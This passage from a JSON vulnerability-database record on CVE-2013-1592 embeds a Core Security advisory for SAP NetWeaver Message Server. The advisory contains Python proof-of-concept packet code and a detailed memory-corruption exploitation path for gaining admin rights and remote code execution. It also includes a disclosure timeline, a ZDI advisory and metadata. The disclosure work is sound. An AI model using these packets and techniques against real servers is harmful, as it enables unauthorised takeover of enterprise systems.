\u0027\\x00\\x00\u0027 # padd\n    send_packet(connection, init)\n\n    # Receive response\n    print \"[*] Receiving login reply\"\n    (length, data) = receive(connection)\n\n    # Parsing login reply\n    server_name = data[4+64:4+64+40]\n\n    return connection\n\n# Main PoC body\nconnection = 
initialize_connection(options.hostname, options.port)\nsend_attack(connection)\n\n-----/\n\n\nIn the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. Malicious\npackets are processed by the vulnerable function \u0027_MsJ2EE_AddStatistics\u0027\nin the \u0027msg_server.exe\u0027 module. \n\nThe vulnerable function \u0027_MsJ2EE_AddStatistics\u0027 receives a pointer to a\n\u0027MSJ2EE_HEADER\u0027 struct as its third parameter, which is fully controlled\nby the attacker. This struct type is defined as follows:\n\n/-----\n00000000 MSJ2EE_HEADER   struct ; (sizeof=0x28, standard type)\n00000000 senderclusterid dd ?\n00000004 clusterid       dd ?\n00000008 serviceid       dd ?\n0000000C groupid         dd ?\n00000010 nodetype        db ?\n00000011                 db ? ; undefined\n00000012                 db ? ; undefined\n00000013                 db ? ; undefined\n00000014 totallength     dd ?\n00000018 currentlength   dd ?\n0000001C currentoffset   dd ?\n00000020 totalblocks     db ?\n00000021 currentblock    db ?\n00000021\n00000022                 db ? ; undefined\n00000023                 db ? ; undefined\n00000024 messagetype     dd ?\n00000028 MSJ2EE_HEADER   ends\n-----/\n The \u0027_MsJ2EE_AddStatistics\u0027 function uses the \u0027serviceid\u0027 field of the\n\u0027MSJ2EE_HEADER\u0027 to calculate an index to write into the\n\u0027j2ee_stat_services\u0027 global array, without properly validating that the\nindex is within the boundaries of the array. On the other hand,\n\u0027j2ee_stat_services\u0027 is a global array of 256 elements of type\n\u0027MSJ2EE_STAT_ELEMENT\u0027:\n\n/-----\n.data:0090B9E0    ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0    j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0    ; DATA XREF: _MsJ2EE_AddStatistics+24o\n.data:0090B9E0    ; _MsJ2EE_AddStatistics+4Co ... 
\n\n-----/\n This vulnerability can be used to corrupt arbitrary memory with\narbitrary values, with some restrictions. The following snippet shows\nthe vulnerable code within the \u0027_MsJ2EE_AddStatistics\u0027 function:\n\n/-----\nmov     edi, [ebp+pJ2eeHeader]\nmov     eax, [edi+MSJ2EE_HEADER.serviceid]              ;attacker\ncontrols MSJ2EE_HEADER.serviceid\nxor     ecx, ecx\ncmp     dword ptr j2ee_stat_total.totalMsgCount+4, ecx\nlea     esi, [eax+eax*8]\nlea     esi, j2ee_stat_services.totalMsgCount[esi*8]    ;using the index\nwithout validating array bounds\n\n-----/\n Since the \u0027serviceid\u0027 value is first multiplied by 9 and then it is\nmultiplied by 8, the granularity of the memory addresses that can be\ntargeted for memory corruption is 0x48 bytes, which is the size of the\n\u0027MSJ2EE_STAT_ELEMENT\u0027 struct:\n\n/-----\n00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)\n00000000                                         ; XREF:\n.data:j2ee_stat_totalr\n00000000                                         ; .data:j2ee_stat_servicesr\n00000000 totalMsgCount   dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1Br\n00000000                                         ;\n_MsJ2EE_AddStatistics+2Fr ... \n00000008 totalMsgLength  dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+192r\n00000008                                         ;\n_MsJ2EE_AddStatistics+19Br ... \n00000010 avgMsgLength    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+1C2w\n00000010                                         ;\n_MsJ2EE_AddStatistics+1C7w ... \n00000018 maxLength       dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+161r\n00000018                                         ;\n_MsJ2EE_AddStatistics+16Er ... \n00000020 noP2PMessage    dq ?                    ; XREF:\n_MsJ2EE_AddStatistics:loc_44D442w\n00000020                                         ;\n_MsJ2EE_AddStatistics+158w ... \n00000028 noP2PRequest    dq ?                    
; XREF:\n_MsJ2EE_AddStatistics+144w\n00000028                                         ;\n_MsJ2EE_AddStatistics+14Aw ... \n00000030 noP2PReply      dq ?                    ; XREF:\n_MsJ2EE_AddStatistics+132w\n00000030                                         ;\n_MsJ2EE_AddStatistics+138w ... \n00000038 noBroadcastMessage dq ?                 ; XREF:\n_MsJ2EE_AddStatistics:loc_44D40Dw\n00000038                                         ;\n_MsJ2EE_AddStatistics+123w ... \n00000040 noBroadcastRequest dq ?                 ; XREF:\n_MsJ2EE_AddStatistics+10Fw\n00000040                                         ;\n_MsJ2EE_AddStatistics+115w ... \n00000048 MSJ2EE_STAT_ELEMENT ends\n\n-----/\n However, it is possible to use different combinations of the\n\u0027flag/iflag\u0027 values in the Message Server packet to gain more precision\nover the memory addresses that can be corrupted. Different combinations\nof \u0027flag/iflag\u0027 values provide different memory corruption primitives,\nas shown below:\n\n/-----\nAt this point:\n * ESI points to an arbitrary, attacker-controlled memory address\n * EBX == 1\n\n.text:0044D359                 movzx   eax, [ebp+msiflag]\n.text:0044D35D                 sub     eax, 0Ch\n.text:0044D360                 jz      short loc_44D37C\n.text:0044D362                 sub     eax, ebx\n.text:0044D364                 jnz     short loc_44D39D\n.text:0044D366                 cmp     [ebp+msflag], 2\n.text:0044D36A                 jnz     short loc_44D374\n.text:0044D36C                 add     [esi+40h], ebx  ; iflag=0xd,\nflag=2 =\u003e add 1 to [esi+0x40]\n.text:0044D36F                 adc     [esi+44h], ecx\n.text:0044D372                 jmp     short loc_44D39D\n.text:0044D374 ;\n---------------------------------------------------------------------------\n.text:0044D374\n.text:0044D374 loc_44D374:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+7Aj\n.text:0044D374                 add     [esi+38h], ebx  ; iflag=0xd,\nflag=1 
=\u003e add 1 to [esi+0x38]\n.text:0044D377                 adc     [esi+3Ch], ecx\n.text:0044D37A                 jmp     short loc_44D39D\n.text:0044D37C ;\n---------------------------------------------------------------------------\n.text:0044D37C\n.text:0044D37C loc_44D37C:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+70j\n.text:0044D37C                 mov     al, [ebp+msflag]\n.text:0044D37F                 cmp     al, 3\n.text:0044D381                 jnz     short loc_44D38B\n.text:0044D383                 add     [esi+30h], ebx  ; iflag=0xc,\nflag=3 =\u003e add 1 to [esi+0x30]\n.text:0044D386                 adc     [esi+34h], ecx\n.text:0044D389                 jmp     short loc_44D39D\n.text:0044D38B ;\n---------------------------------------------------------------------------\n.text:0044D38B\n.text:0044D38B loc_44D38B:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+91j\n.text:0044D38B                 cmp     al, 2\n.text:0044D38D                 jnz     short loc_44D397\n.text:0044D38F                 add     [esi+28h], ebx  ; iflag=0xc,\nflag=2 =\u003e add 1 to [esi+0x28]\n.text:0044D392                 adc     [esi+2Ch], ecx\n.text:0044D395                 jmp     short loc_44D39D\n.text:0044D397 ;\n---------------------------------------------------------------------------\n.text:0044D397\n.text:0044D397 loc_44D397:                             ; CODE XREF:\n_MsJ2EE_AddStatistics+9Dj\n.text:0044D397                 add     [esi+20h], ebx  ; iflag=0xc,\nflag=1 =\u003e add 1 to [esi+0x20]\n.text:0044D39A                 adc     [esi+24h], ecx\n\n[...]\n\n-----/\n And the following code excerpt is always executed within the\n\u0027_MsJ2EE_AddStatistics\u0027 function, providing two more memory corruption\nprimitives:\n\n/-----\n.text:0044D3B7                 add     [esi],\nebx                               ;add 1 to [esi]\n.text:0044D3B9                 adc     dword ptr [esi+4], 0\n.text:0044D3BD                 mov 
    eax,\n[edi+MSJ2EE_HEADER.totallength]     ;MSJ2EE_HEADER.totallength is fully\ncontrolled by the attacker\n.text:0044D3C0                 cdq\n.text:0044D3C1                 add     [esi+8],\neax                             ;add an arbitrary number to [esi+8]\n\n-----/\n This memory corruption vulnerability can be used by remote\nunauthenticated attackers to execute arbitrary code on vulnerable\ninstallations of SAP Netweaver, but it can also be abused to modify the\ninternal state of the vulnerable service in order to gain administrative\nprivileges within the SAP Netweaver Message Server. \n\nA client connected to the Message Server may have administrative\nprivileges or not. The Message Server holds a structure of type\n\u0027MSADM_s\u0027 for each connected client, which contains information about\nthat very connection. Relevant parts of the \u0027MSADM_s\u0027 struct type are\nshown below:\n\n/-----\n00000000 MSADM_s         struc ; (sizeof=0x538, standard type)\n00000000                                         ; XREF: .data:dummy_clientr\n00000000 client_type     dd ?                    ; enum MS_CLIENT_TYPE\n00000004 stat            dd ?                    ; enum MS_STAT\n00000008 connection_ID   dd ?\n0000000C status          db ?\n0000000D dom             db ?                    ; XREF: MsSFillCon+3Cw\n0000000E admin_allowed   db ?\n0000000F                 db ? ; undefined\n00000010 name            dw 40 dup(?)\n[...]\n00000534 _padding        db 4 dup(?)\n00000538 MSADM_s         ends\n\n-----/\n The \u0027admin_allowed\u0027 field at offset 0x0E is a boolean value that\nindicates whether the connected client has administrative privileges or\nnot. 
When a new client connects, the \u0027MsSLoginClient\u0027 function of the\nMessage Server sets the proper value for the \u0027admin_allowed\u0027 field in\nthe \u0027MSADM_s\u0027 struct instance associated with that client:\n\n/-----\n.text:004230DC\nloc_4230DC:                                                  ; CODE\nXREF: MsSLoginClient+AAAj\n.text:004230DC\n   ; MsSLoginClient+B26j\n.text:004230DC                 cmp     byte ptr [edi+0Eh],\n0                ; privileged client?\n.text:004230E0                 jnz     short\nloc_4230EA                     ; if yes, jump\n.text:004230E2                 mov     al, byte ptr\nms_admin_allowed        ; otherwise, grab the value of the\n\"ms_admin_allowed\" global variable... \n.text:004230E7                 mov     [edi+0Eh],\nal                        ; ...and save it to MSADM_s.admin_allowed\n\n-----/\n So if we manage to overwrite the value of the \u0027ms_admin_allowed\u0027 global\nvariable with a value different than 0, then we can grant administrative\nprivileges to our unprivileged connections. In SAP Netweaver\n\u0027msg_server.exe\u0027 v7200.70.18.23869, the \u0027ms_admin_allowed\u0027 global\nvariable is located at \u00270x008f17f0\u0027:\n\n/-----\n.data:008F17F0 ; int ms_admin_allowed\n.data:008F17F0 ms_admin_allowed dd ?                   ; DATA XREF:\nMsSSetMonitor+7Ew\n.data:008F17F0                                         ; MsSLoginClient+B62r\n\n-----/\n And the \u0027j2ee_stat_services\u0027 global array, which is the array that can\nbe indexed outside its bounds, is located at \u00270x0090b9e0\u0027:\n\n/-----\n.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256]\n.data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(\u003c?\u003e)\n.data:0090B9E0                                         ; DATA XREF:\n_MsJ2EE_AddStatistics+24o\n.data:0090B9E0                                         ;\n_MsJ2EE_AddStatistics+4Co ... 
\n\n-----/\n So, by providing \u0027MSJ2EE_HEADER.serviceid == 0x038E3315\u0027, we will be\ntargeting \u00270x008F17C8\u0027 as the base address for memory corruption. Having\nin mind the different memory corruption primitives based on combinations\nof \u0027flag/iflag\u0027 fields described above, by specifying \u0027iflag == 0xC\u0027 and\n\u0027flag == 0x2\u0027 in our Message Server packet we will be able to add 1 to\n\u0027[0x008F17C8+0x28]\u0027, effectively overwriting the contents of\n\u00270x008F17F0\u0027 (\u0027ms_admin_allowed\u0027). After overwriting \u0027ms_admin_allowed\u0027,\nall of our future connections will have administrative privileges within\nthe Message Server. \n\nAfter gaining administrative privileges for our future connections,\nthere are at least two possible paths of exploitation:\n\n   1. Of\ncourse it is not mandatory to have administrative privileges in order to\noverwrite function pointers, but considering the limitation of\ntargetable addresses imposed by the little granularity of the memory\ncorruption, some of the most handy-to-exploit function pointers happened\nto be accessible just for administrative connections. \n   2. Modify the configuration and behavior of the server. That includes\nchanging Message Server\u0027s runtime parameters and enabling Monitor Mode\nin the affected server. \n\n8.1.1. *Gaining remote code execution by overwriting function pointers*\n\nHaving in mind that the granularity of the memory addresses that can be\ntargeted for memory corruption is not that flexible (0x48 bytes) and the\nlimited memory corruption primitives available, it takes some effort to\nfind a function pointer that can be overwritten with a useful value and\nwhich can be later triggered with a network packet. 
\n\nOne possibility is to overwrite one of the function pointers which are\nin charge of handling the modification of Message Server parameters:\n\n/-----\n.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]\n\n; function pointers associated to the modification of the \"ms/max_sleep\"\nparameter\n.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER\n\u003coffset aMsMax_sleep, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\ ; \"rdisp/TRACE_PATTERN_2\"\n.data:0087DED0                                              offset\nMsSSetMaxSleep\u003e\n\n; function pointers associated to the modification of the \"ms/max_vhost\"\nparameter\n.data:0087DED0                 SHMPRF_CHANGEABLE_PARAMETER \u003coffset\naMsMax_vhost, \\\n.data:0087DED0                                              offset\nMsSTestInteger, \\                    ;\u003c-- we can overwrite this one\n.data:0087DED0                                              offset\nMsSSetMaxVirtHost\u003e\n\n[...]\n\n-----/\n By providing \u0027MSJ2EE_HEADER.serviceid == 0x038E1967\u0027 we can target\n\u00270x0087DED8\u0027 as the base address for memory corruption. In this case we\ncan use the memory corruption primitive at address \u00270x0044D3C1\u0027 that\nalways gets executed, which will allow us to add an arbitrary number\n(the value of \u0027MSJ2EE_HEADER.totallength\u0027) to \u0027[0x0087DED8+8]\u0027\neffectively overwriting the function pointer shown above\n(\u0027ms_changeable_parameter[1].set\u0027). \n\nAfter that we need to send a \u0027MS_SET_PROPERTY\u0027 request, specifying\n\u0027ms/max_vhost\u0027 as the name of the property to be changed. 
This\n\u0027MS_SET_PROPERTY\u0027 packet will make our overwritten function pointer to\nbe called from the \u0027MsSChangeParam\u0027 function:\n\n/-----\n.text:00404DB3 loc_404DB3:                             ; CODE XREF:\nMsSChangeParam+CDj\n.text:00404DB3                 lea     esi, [edi+edi*2]\n.text:00404DB6                 mov     edi, [ebp+pvalue]\n.text:00404DB9                 add     esi, esi\n.text:00404DBB                 mov     edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2                 add     esi, esi\n.text:00404DC4                 push    edi\n.text:00404DC5                 push    pname\n.text:00404DC6                 call    edx              ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n   1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n   2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). 
\nAfter sending the second \u0027MS_SET_PROPERTY\u0027 packet, the SAP Netweaver\nMessage Server will start listening on the specified port, waiting for\nconnections from instances of the msmon.exe monitoring program [4]. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n    crash+= \"\\x00\\x00\\x00\\x01\"\n    crash+= \"\\xff\\xff\\xff\\xff\"\n    crash+= \"\\x00\\x00\\x00\\x00\"\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. 
\n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+= \"AD-EYECATCH\\x00\"\n    crash+= \"\\x01\\x01\"\n    crash+= \"%11d\" % 104\n    crash+= \"%11d\" % 1\n    crash+= \"\\x15\\x00\\x00\\x00\"\n    crash+= \"\\x20\\x00\\x00\\xc8\"\n    crash+= \"LALA\" + \u0027 \u0027*(20-4)\n    crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n    crash+= \" \"*36\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n\n2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013.\n\n2012-12-10:\nCore sends an advisory draft with technical details and a PoC.\n\n2012-12-11:\nThe SAP team confirms the reception of the issue.\n\n2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012.\nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day on Feb 12th 2013.\n\n2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013.\n\n2012-12-28:\nSAP notifies Core that they will be contacted if tests fail in order to\nre-schedule the advisory publication.\n\n2013-01-22:\nFirst release date missed. 
2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned.\n\n2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosure on Feb 12th. Core also asks for additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to the security bulletin, CVEs, and patches in\norder to verify whether those patches effectively fix the reported flaws.\n\n2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVEs were assigned to them. Those\nvulnerabilities seem to be related to ZDI advisories [6], [7], [8].\n\n2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks for additional information regarding the affected and\npatched version numbers.\n\n2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nthe note will provide further information regarding this vulnerability.\n\n2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603 \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm \n\n[5] SAP Security notes Feb 2012\nhttps://service.sap.com/sap/support/notes/1649840 \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/ \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/ \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/ \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. 
We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n-- CVE ID:\n\n\n-- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n-- Affected Vendors:\nSAP\n\n-- Affected Products:\nSAP NetWeaver\n\n\n-- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n-- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section40\n\n\n-- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n-- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, the Zero Day Initiative (ZDI) represents\na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n    http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. 
Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n    http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n    http://twitter.com/thezdi\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      }
    ],
    "trust": 5.49
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=24511",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-1592",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "57956",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1028148",
        "trust": 1.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "24511",
        "trust": 1.7
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104",
        "trust": 0.9
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433",
        "trust": 0.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112",
        "trust": 0.8
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1396",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1394",
        "trust": 0.7
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-1395",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "54229",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "54231",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367",
        "trust": 0.6
      },
      {
        "db": "IVD",
        "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "IVD",
        "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
        "trust": 0.2
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "120350",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "114279",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-112"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-111"
      },
      {
        "db": "ZDI",
        "id": "ZDI-12-104"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-1592"
      },
      {
        "db": "BID",
        "id": "57956"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007127"
      },
      {
        "db": "PACKETSTORM",
        "id": "120350"
      },
      {
        "db": "PACKETSTORM",
        "id": "114279"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201302-367"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-1592"
      }
    ]
  },
  "id": "VAR-202001-0832",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ],
    "trust": 1.87111164
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 1.6
      }
    ],
    "sources": [
      {
        "db": "IVD",
        "id": "29348194-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "IVD",
        "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3434"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2012-3433"
      }
    ]
  },
  "last_update_date": "2024-07-23T22:37:43.319000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SAP has issued an update to correct this vulnerability.",
        "trust": 1.4,
        "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
      },
      {
        "title": "top page",
        "trust": 0.8,
        "url": "https://www.sap.com/japan/index.html"
      },
      {
